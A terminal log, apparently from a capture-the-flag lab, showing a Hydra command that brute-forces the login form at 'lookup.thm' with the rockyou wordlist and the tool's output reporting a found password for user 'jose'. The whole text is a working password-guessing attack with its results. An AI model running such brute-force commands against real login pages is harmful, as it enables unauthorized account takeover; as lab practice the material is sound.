hydra -l jose -P /usr/share/wordlists/rockyou.txt lookup.thm  http-post-form "/login.php:username=jose&password=^PASS^:Wrong Password"
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-24 09:11:30
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://lookup.thm:80/login.php:username=jose&password=^PASS^:Wrong Password
[STATUS] 1028.00 tries/min, 1028 tries in 00:01h, 14343371 to do in 232:33h, 16 active
[80][http-post-form] host: lookup.thm   login: jose   password: password123
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-03-24 09:12:55
